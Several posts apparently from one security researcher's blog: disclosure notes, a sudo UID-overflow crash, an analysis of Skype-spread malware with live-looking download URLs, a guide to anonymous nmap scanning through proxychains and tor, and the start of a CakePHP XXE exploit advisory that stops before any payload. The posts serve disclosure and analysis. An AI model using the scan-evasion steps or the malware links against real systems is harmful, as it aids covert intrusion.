Recently i also have been acknowledged by Microsoft for responsible disclosure (through <a href="http://www.beyondsecurity.com/ssd.html" target="_blank">SSD</a>) of two denial of service vulnerabilities affecting the iSCSI Target (CVE-2014-0255 and CVE-2014-0256). MS Bulletin can be found here <a href="https://technet.microsoft.com/library/security/ms14-028" target="_blank">MS14-028</a>.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-53801032800008320052014-03-10T22:13:00.001+01:002014-03-10T22:13:23.018+01:00Browser ShreddersBlog for a project that i'm a part of has been finally published - <a href="http://browser-shredders.blogspot.com/" target="_blank">http://browser-shredders.blogspot.com</a>. The research has started some time ago, and we already had some nice findings, currently there is not so much content, but this will change after the Hack in The Box talk which will be presented by my two colleges: <a href="http://haxpo.nl/hitb2014ams-pilorz-zmyslowski/" target="_blank">http://haxpo.nl/hitb2014ams-pilorz-zmyslowski/</a>.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-1329715278177806382013-11-25T20:49:00.001+01:002013-11-25T20:49:22.711+01:00ZDI-13-252 - Cogent DataHub Heap Overflow Remote Code Execution VulnerabilityZero Day Initiative (ZDI) has published an advisory for a heap overflow vulnerability in Cogent DataHub which i have found few months ago. Full advisory can be read here <a href="http://zerodayinitiative.com/advisories/ZDI-13-252/" target="_blank">ZDI-13-252</a>.<br />
<br />
Earlier this year i have also found some null pointer dereference bugs leading to a denial of service in DataHub. I will post some PoC's soon.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-80107518097652629702013-09-03T20:54:00.002+02:002013-09-03T20:54:37.518+02:00Funny sudo bugAround a month ago i was performing a task where i needed to create a user with a very large UID in the system. The required UID happened to be <b>2147483648 (0x80000000) </b>exactly.<br />
<br />
<blockquote class="tr_bq">
root@hive:~# adduser -u 2147483648 test1</blockquote>
Next i switched to the newly created user and typed sudo.<br />
<blockquote class="tr_bq">
test1@hive:/$ su test1 <br />
test1@hive:/$ sudo
</blockquote>
And this was the result:
<br />
<blockquote class="tr_bq">
test1@hive:/$ sudo <br />
sudo: perm stack underflow: Invalid argument <br />
sudo: unknown uid: 2147483647 <br />
Segmentation fault </blockquote>
We can see here that the UID value was wrapped to the 2147483647 value (0x7fffffff) followed by a segfault.<br />
<br />
We can have some fun with it e.g. creating a user with the 0x7fffffff UID. This way sudo will no longer crash, but it will be called for a different user : ). The bug was tested on the 1.8.5p2 version 32-bit OS. Additional details can be found in the <a href="http://www.sudo.ws/bugs/show_bug.cgi?id=609" target="_blank">bug report</a>.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-66850331808468395322013-03-18T19:05:00.002+01:002013-03-18T23:24:59.507+01:00Skype Malware AnalysisWhen i came back from work today and fired up Skype, multiple messages popped up immediately. Some of them in in English and some in Polish, but all leading to the same url with "pictures" of me ; oo. Another interesting fact was that all the messages came from people working at the same company (zomg APT alert ;D).<br />
<br />
The messages looked like this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCd0yaLELe_qQiypp8GWO83X1qFjGvax8anrhUKhJyOlElKKLPexPD_1upQITFXHuAL14pQvDk4N56fK3GpJ7pbqiM5_k-9kLT9IFloVzOfFxEJt8KlpPf1FMCfUwHw6JdAnYz2gadU_8/s1600/1_blog.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCd0yaLELe_qQiypp8GWO83X1qFjGvax8anrhUKhJyOlElKKLPexPD_1upQITFXHuAL14pQvDk4N56fK3GpJ7pbqiM5_k-9kLT9IFloVzOfFxEJt8KlpPf1FMCfUwHw6JdAnYz2gadU_8/s320/1_blog.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 13px;">Messages in English and Polish encouraging to visit the links</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
We check what is behind the url shortener:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ZXxRkepZWW-6rrgzFnsTDrP1cbEd1JblJVi_50qYtxUTKvjedbI3A6JRzFpoqowi8eIISIRIUfKh8t-pyC5HH_QooE7TlonsOID4k1T3P7G5gUA0xP8Yf_5uoLpsX6gQJiumbofDklU/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ZXxRkepZWW-6rrgzFnsTDrP1cbEd1JblJVi_50qYtxUTKvjedbI3A6JRzFpoqowi8eIISIRIUfKh8t-pyC5HH_QooE7TlonsOID4k1T3P7G5gUA0xP8Yf_5uoLpsX6gQJiumbofDklU/s400/2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">zip file !</td></tr>
</tbody></table>
Crunchpress seems to be a 'hacked' website:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_i2y5EUXvNETW8IwgXDHA5KWK2oWuYIis6_TJlOPQLbZKJmFTsSSwYbGZyp3z0zRE0Mc2FiCldRbJz07qVRAlaCKbuwYF_WgvJj7sPPbwKzIRHo_SXnWjDKREN4_XKLlwdNTQwfrM-0o/s1600/5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_i2y5EUXvNETW8IwgXDHA5KWK2oWuYIis6_TJlOPQLbZKJmFTsSSwYbGZyp3z0zRE0Mc2FiCldRbJz07qVRAlaCKbuwYF_WgvJj7sPPbwKzIRHo_SXnWjDKREN4_XKLlwdNTQwfrM-0o/s320/5.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">crunchpress image folder with some aditional content</td></tr>
</tbody></table>
Lets download and unzip it:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjVR4LOfPqV6jMy9jcZuDzGs3KkhBUZEQESJxwcr64USu07pnrrWlf1WVRn_Vg83VzYwoAg9tLpwgUm87wHIacVNgzivHj_vkTCoXd72j5l5di1991NGyftcTlRHJKKK12hQeyU_jvv4Q/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjVR4LOfPqV6jMy9jcZuDzGs3KkhBUZEQESJxwcr64USu07pnrrWlf1WVRn_Vg83VzYwoAg9tLpwgUm87wHIacVNgzivHj_vkTCoXd72j5l5di1991NGyftcTlRHJKKK12hQeyU_jvv4Q/s320/3.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Oh noez! no pics just exe : (</td></tr>
</tbody></table>
Quick scan @ virustotal.com gives 7/44 and identifies the file as a dropper:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5ui00XJ2-aAn4uQ2t1FDfUXK5bS4xDuWkJhmvfLp-C9ogW8oIkUqU21QUdTrcg90kwcGt-ObwthxX778p2IbOYadbuPG7GcU9xHVN9tGJMdr8wFjV7RWwXaA61LX56WFUCpwMBtOOYN0/s1600/4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5ui00XJ2-aAn4uQ2t1FDfUXK5bS4xDuWkJhmvfLp-C9ogW8oIkUqU21QUdTrcg90kwcGt-ObwthxX778p2IbOYadbuPG7GcU9xHVN9tGJMdr8wFjV7RWwXaA61LX56WFUCpwMBtOOYN0/s320/4.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">virustotal results</td></tr>
</tbody></table>
Not surprisingly it downloads something using HTTP protocol:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5pvc82KZHDVNyHBzAWjynBbRHtiT8h2EPwjqz9r-1DVjvD36qG1JAkWfTk-W4OPLyO-NA0i-FZc1zLan8Nt1O8gmYpB0av95MY3HALTrQKni9-f3oY7IQeeCzY8ZsTmxyCMS3xIClc4A/s1600/traffic.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5pvc82KZHDVNyHBzAWjynBbRHtiT8h2EPwjqz9r-1DVjvD36qG1JAkWfTk-W4OPLyO-NA0i-FZc1zLan8Nt1O8gmYpB0av95MY3HALTrQKni9-f3oY7IQeeCzY8ZsTmxyCMS3xIClc4A/s320/traffic.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Actual bad stuff downloaded here</td></tr>
</tbody></table>
Let's see what we have there. First some quick geo localization request:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU7_rHE7nSo8pHNtZeXxYPCKPN84gFrrM8-_pypssHv5wHKHi79AG2w8Pz37nN-YuXMHQsqjTmxEwCtcbe5FJBijS7cjTtenyFOedWhgWI8lNNzZxJfMkpTCQ6OnhIhJvvCBIPkEnyVKY/s1600/geoloc.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU7_rHE7nSo8pHNtZeXxYPCKPN84gFrrM8-_pypssHv5wHKHi79AG2w8Pz37nN-YuXMHQsqjTmxEwCtcbe5FJBijS7cjTtenyFOedWhgWI8lNNzZxJfMkpTCQ6OnhIhJvvCBIPkEnyVKY/s1600/geoloc.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">hi ho</td></tr>
</tbody></table>
Next a list of 'unwanted' domain names is downloaded (full list available <a href="http://howl.overflow.pl/skype.txt" target="_blank">here</a>).<br />
<br />
<a name='more'></a><div>
Risold.de where the file n.txt is hosted looks like another pwned web server.</div>
<div>
<br /></div>
<div>
Now we have three PE files downloaded from different locations:</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1m4TJTudKLEVql3pZ5vnxR3htwMiRIhG7bU9bUt-6Y5QXi9PXrpsK0P6_lKfx9ZgHoTKYNKdLwYXvlTbFFQ9DWtwU1Hz9irxUg-B7Lk1YyyolX5WkWyrN6D_B2O4YvGhnBoz2iwGAHM/s1600/pureevil.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1m4TJTudKLEVql3pZ5vnxR3htwMiRIhG7bU9bUt-6Y5QXi9PXrpsK0P6_lKfx9ZgHoTKYNKdLwYXvlTbFFQ9DWtwU1Hz9irxUg-B7Lk1YyyolX5WkWyrN6D_B2O4YvGhnBoz2iwGAHM/s320/pureevil.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">file number 2</td></tr>
</tbody></table>
<div>
The detection ratio is higher (14/45), and the file is recognized as generic trojan:</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjsCiZuAChUhFzmvOmFtHU1TQ-jJlFdPGSIgNXlvaqU_7hfcS9m0r527JfvOa9YC0CTLTEWi16LTCPJarTAyv40hedvWhdXEDYYavvVkQHY83BzOi906kNOjr6gcSbv0akW-0fF1euqrM/s1600/virustotal2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjsCiZuAChUhFzmvOmFtHU1TQ-jJlFdPGSIgNXlvaqU_7hfcS9m0r527JfvOa9YC0CTLTEWi16LTCPJarTAyv40hedvWhdXEDYYavvVkQHY83BzOi906kNOjr6gcSbv0akW-0fF1euqrM/s320/virustotal2.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">fbp.exe virustotal ratio</td></tr>
</tbody></table>
<div>
Both files seem to be developed on the same machine by the same Visual C++ user, as they contain the following string:</div>
<blockquote class="tr_bq">
C:\Users\Samim\Desktop\Stab\stb\Release\stb.pdb</blockquote>
The site hosting the fbp.exe is some Indian company.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFZK50WPGXCDKKa6kNWSMyUkY3vAtuTYQwEOAfNvOvVYo-m0Ys4DTttoVV3UdPgG4fvpXP0bCsZSYrEDqmhSOpKJ7AkN8ilXa3YGG6fPAsCsID4wmDjp-UKj2d91-merW5mpIcdtfa8E/s1600/india.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFZK50WPGXCDKKa6kNWSMyUkY3vAtuTYQwEOAfNvOvVYo-m0Ys4DTttoVV3UdPgG4fvpXP0bCsZSYrEDqmhSOpKJ7AkN8ilXa3YGG6fPAsCsID4wmDjp-UKj2d91-merW5mpIcdtfa8E/s320/india.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">site hosting malware</td></tr>
</tbody></table>
Ok, now the third file. This one is different, hosted on hotfile.com<br />
<br />
<ul>
<li>http://hotfile.com/dl/198796835/3487ec8/f.exe.html</li>
</ul>
<br />
It is only detected by Kaspersky as a "UDS:DangerousObject.Multi.Generic".<br />
<br />
In the packet capture i was also able to observe some IRC alike communication on port 1863.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUAkJVTNHCKNbGYdFtndrQs-8-4trx3AeXZpEUIKeEXlulg0ZQe-qHe0S3lKQEZZFkygnCewy5GPHvPVHdOM7TvpNBOudFtGYtJfTY1Di_4o3mghMitFcaKU7tDq49NJKSIkOViw25iw/s1600/ircalike.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUAkJVTNHCKNbGYdFtndrQs-8-4trx3AeXZpEUIKeEXlulg0ZQe-qHe0S3lKQEZZFkygnCewy5GPHvPVHdOM7TvpNBOudFtGYtJfTY1Di_4o3mghMitFcaKU7tDq49NJKSIkOViw25iw/s320/ircalike.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRC ?</td></tr>
</tbody></table>
xixbh.net domain resolves to this IP (China ;D). That explains the strange characters. So this is probably the C&C IRC managed botnet. I will stop here : ).<br />
<br />
This was just a quick analysis, and it is a bit chaotic (sorry for that). If i will find some free time, a follow up with the executables analysis will show up here.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-45004160709385949452012-09-18T22:28:00.000+02:002012-09-18T22:28:11.476+02:00Anonymous port scanning using proxychains and torWhen testing a web application or doing a reconnaissance Tor Browser Bundle is all we need to hide our true identity, but what about other activities? In this short post i will explain how to stay anonymous during port scanning. We will need the following tools to achieve this goal:<br />
<br />
<ul>
<li>tor,</li>
<li>proxychains,</li>
<li>nmap. </li>
</ul>
<div>
Proxychains is a proxifier supporting HTTP, SOCKS4 and SOCKS5 proxies. It is shipped with BackTrack Linux by default and already configured to use tor. You can verify this by looking up /etc/proxychain.conf, last line should be like this:</div>
<div>
<script src="https://gist.github.com/3745472.js?file=proxychains.conf"></script></div>
<br />
We are ready to fire up nmap:<br />
<script src="https://gist.github.com/3745529.js?file=scan.sh"></script><br />
<br />
Now, let me explain what happened there. We run nmap thru proxychains with the following options:<br />
<br />
<ul>
<li>-sT - full TCP connection scan</li>
<li>-PN - do not perform host discovery</li>
<li> -n - never perform DNS resolution (to prevent DNS leaks from tor)</li>
<li>-sV - determine service version/info</li>
<li>-p - ports to scan (for testing purposes i only gave 3 ports to scan, proxying a portscan thru tor makes it really slow, so perhaphs --top-ports option should be taken in consideration)</li>
<li><host ip="ip"> - self explanatory</host></li>
</ul>
In the scan log we can see the "chain" that goes from 127.0.0.1:9050 (tor proxy) to our scanned host. It is possible that we will encounter a situation where this scan fails, because tor endpoints are often blocked (the reason is spam or other malicious activity). The solution may be adding a common, public proxy to the "chain". We can do that by simply editing the proxychains.conf and adding a new entry at the end of the [ProxyList] (be sure that random_chain option is disabled).<br />
<br />
That's all for tonight, hope somebody will find this information useful.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com1tag:blogger.com,1999:blog-4014979627879654228.post-18458021621661824802012-07-16T00:14:00.000+02:002012-09-07T19:09:54.911+02:00CakePHP 2.x XXE injection<br />
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<table style="background-image: none !important; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-collapse: collapse !important; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><tbody style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="content" style="background-image: none !important; border-bottom-width: 0px !important; border-left-style: none !important; border-right-width: 0px !important; border-top-width: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px 0px 0px 0.5em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: top !important; width: auto !important;"><code class="plain" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Exploit title: CakePHP XXE injection<br /># Date: 01.07.2012</code></td></tr>
</tbody></table>
</div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<table style="background-image: none !important; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-collapse: collapse !important; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><tbody style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="content" style="background-image: none !important; border-bottom-width: 0px !important; border-left-style: none !important; border-right-width: 0px !important; border-top-width: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px 0px 0px 0.5em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: top !important; width: auto !important;"><code class="plain" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Software Link: http://www.cakephp.org<br /># Vulnerable version: 2.x - 2.2.0-RC2</code></td></tr>
</tbody></table>
</div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<table style="background-image: none !important; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-collapse: collapse !important; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><tbody style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="content" style="background-image: none !important; border-bottom-width: 0px !important; border-left-style: none !important; border-right-width: 0px !important; border-top-width: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px 0px 0px 0.5em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: top !important; width: auto !important;"><code class="plain" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># Tested on: Windows and Linux</code><br />
<code class="plain" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># CVE: CVE-2012-4399<br /># Author: Pawel Wylecial</code></td></tr>
</tbody></table>
</div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<table style="background-image: none !important; border-bottom-left-radius: 5px; border-bottom-right-radius: 5px; border-collapse: collapse !important; border-top-left-radius: 5px; border-top-right-radius: 5px; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><tbody style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<tr style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"><td class="content" style="background-image: none !important; border-bottom-width: 0px !important; border-left-style: none !important; border-right-width: 0px !important; border-top-width: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px 0px 0px 0.5em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: top !important; width: auto !important;"><code class="plain" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"># http://h0wl.pl</code></td></tr>
</tbody></table>
</div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
1. Background</div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<br /></div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."</div>
